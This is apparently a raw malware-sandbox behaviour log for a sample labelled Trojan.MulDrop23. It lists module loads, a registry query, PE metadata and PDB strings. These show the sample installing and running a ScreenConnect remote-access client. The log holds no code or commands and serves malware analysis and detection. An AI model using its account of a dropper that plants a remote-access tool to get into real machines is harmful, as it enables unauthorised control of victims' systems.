                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mccsusershared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic file information: File size 13456896 > 1048576
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xcd4c00
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.4.dr
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
                        Source: Binary string: System.Configuration.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.4.dr
                        Source: Binary string: System.Core.pdb@ source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Configuration.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr
                        Source: Binary string: System.Xml.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: mscorlib.pdb( source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345857367.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.6.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr
